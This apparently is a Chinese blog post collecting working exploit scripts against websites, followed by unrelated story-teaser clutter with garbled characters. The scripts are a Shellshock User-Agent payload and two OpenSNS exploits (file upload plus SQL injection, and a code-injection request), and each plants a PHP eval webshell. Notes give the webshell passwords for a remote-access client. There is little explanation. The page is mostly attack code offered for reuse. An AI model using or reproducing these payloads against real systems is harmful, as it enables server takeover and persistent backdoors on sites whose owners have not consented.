一些網(wǎng)站的poc

bash漏洞的poc

import requests
url='http://10.4.0.12/cgi-bin/duweihy123.cgi'
headers={"User-Agent":"() { :;}; echo `/bin/echo '<?php @eval($_POST[\"c\"]);?>' > /usr/local/nginx/html/duwei321.php`"}
#apache /var/www/html
response=requests.get(url,headers=headers)
print(response.text)

菜刀鏈接，一句話密碼是c,路徑是http://xxx/duwei321.php
opensns網(wǎng)站的poc

# -*- coding:utf-8 -*-

import requests
import random
import re
import os

s = requests.Session()
url = 'http://10.2.0.112/'     #Ｇ羲啤Ｈ鞣拧臀玄！此處需改動(dòng)

def getRandomName():
    name = ''
    for i in range(4):
        name += chr(random.randint(97, 122))
    return name

def register():
    global s
    registerUrl = url + 'index.php?s=/ucenter/member/register.html'
    nickname = getRandomName()

    headers = {
        'Referer': registerUrl,
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    data = {
        'role': '1',
        'username': nickname+'@test.com',
        'nickname': nickname,
        'password': '123456',
        'reg_type': 'email',
    }
    r = s.post(registerUrl, data=data, headers=headers)

    return nickname

def login(username):
    global s
    loginUrl = url + 'index.php?s=/ucenter/member/login.html'

    headers = {
        'Referer': loginUrl,
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        #'X-Requested-With': 'XMLHttpRequest',
    }
    data = {
        'username': username,
        'password': '123456',
        'remember': '0',
        'from': loginUrl,
    }
    r = s.post(loginUrl, data=data, headers=headers)
    #print(r.text)

def upload():
    global s
    uploadUrl = url + 'index.php?s=/weibo/share/doSendShare.html'
    file = {'file_img': open('/Users/fuqi/Desktop/small.php', 'r')}     #Ｔ厶āＭ汲铩卫漫！此處需改動(dòng)
    data = {
        'content': '123',
        'query': 'app=Home&model=File&method=upload&id=',
    }
    r = s.post(uploadUrl, data=data, files=file)
    #print(r.text)

def getShell():
    global s
    exp = url + 'index.php?s=/ucenter/index/information/uid/23333 union (select 1,2,concat(savepath,savename),4 from ocenter_file where savename like 0x252e706870 order by id desc limit 0,1)#.html'
    r = s.get(exp)
    pattern=re.compile(r'<attr title=.*?>(.*?)</attr>')
    item=re.findall(pattern, r.text)
    print(item)

def main():
    username = register()
    login(username)
    upload()
    getShell()

if __name__ == '__main__':
    main() 

os.system("pause")

菜刀鏈接菲饼，路徑會(huì)返回

opensns另外一個(gè)版本的poc

import requests
url='http://10.2.0.141/index.php?s=people/index/area.html'
data={
    'areamap':"/map/e",
    'areasite':"file_put_contents('/usr/share/nginx/open/Uploads/15.php','<?php eval($_POST[lac]);?>');"
}
reponse=requests.post(url,data=data)
print(reponse.status_code)

菜刀鏈接，密碼是lac列赎，位置在upload的路徑下

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末宏悦，一起剝皮案震驚了整個(gè)濱河市镐确，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌饼煞，老刑警劉巖源葫，帶你破解...
沈念sama閱讀 222,378評(píng)論 6贊 516
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場(chǎng)離奇詭異砖瞧，居然都是意外死亡息堂，警方通過(guò)查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 94,970評(píng)論 3贊 399
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門块促，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)荣堰，“玉大人，你說(shuō)我怎么就攤上這事竭翠≌窦幔” “怎么了？”我有些...
開封第一講書人閱讀 168,983評(píng)論 0贊 362
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵斋扰，是天一觀的道長(zhǎng)渡八。經(jīng)常有香客問(wèn)我，道長(zhǎng)传货，這世上最難降的妖魔是什么屎鳍？我笑而不...
開封第一講書人閱讀 59,938評(píng)論 1贊 299
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮问裕，結(jié)果婚禮上逮壁，老公的妹妹穿的比我還像新娘。我一直安慰自己僻澎，他們只是感情好貌踏，可當(dāng)我...
茶點(diǎn)故事閱讀 68,955評(píng)論 6贊 398
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開白布。她就那樣靜靜地躺著窟勃，像睡著了一般祖乳。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上秉氧，一...
開封第一講書人閱讀 52,549評(píng)論 1贊 312
城市分裂傳說(shuō)
那天眷昆，我揣著相機(jī)與錄音，去河邊找鬼汁咏。笑死亚斋，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的攘滩。我是一名探鬼主播帅刊，決...
沈念sama閱讀 41,063評(píng)論 3贊 422
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼漂问！你這毒婦竟也來(lái)了赖瞒？” 一聲冷哼從身側(cè)響起女揭，我...
開封第一講書人閱讀 39,991評(píng)論 0贊 277
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎栏饮，沒(méi)想到半個(gè)月后吧兔，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 46,522評(píng)論 1贊 319
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡袍嬉，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 38,604評(píng)論 3贊 342
?白月光啟示錄
正文我和宋清朗相戀三年境蔼，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片伺通。...
茶點(diǎn)故事閱讀 40,742評(píng)論 1贊 353
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡箍土，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出罐监，到底是詐尸還是另有隱情涮帘，我是刑警寧澤，帶...
沈念sama閱讀 36,413評(píng)論 5贊 351
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布笑诅，位于F島的核電站，受9級(jí)特大地震影響疮鲫，放射性物質(zhì)發(fā)生泄漏吆你。R本人自食惡果不足惜，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 42,094評(píng)論 3贊 335
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一俊犯、第九天我趴在偏房一處隱蔽的房頂上張望妇多。院中可真熱鬧，春花似錦燕侠、人聲如沸者祖。這莊子的主人今日做“春日...
開封第一講書人閱讀 32,572評(píng)論 0贊 25
一樁弒父案绢彤，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)七问。三九已至，卻和暖如春茫舶，著一層夾襖步出監(jiān)牢的瞬間械巡，已是汗流浹背。一陣腳步聲響...
開封第一講書人閱讀 33,671評(píng)論 1贊 274
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工饶氏，沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留讥耗，地道東北人。一個(gè)月前我還...
沈念sama閱讀 49,159評(píng)論 3贊 378
代替公主和親
正文我出身青樓疹启，卻偏偏與公主長(zhǎng)得像古程，于是被迫代替她去往敵國(guó)和親。傳聞我的和親對(duì)象是個(gè)殘疾皇子喊崖，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 45,747評(píng)論 2贊 361

一些網(wǎng)站的poc

推薦閱讀更多精彩內(nèi)容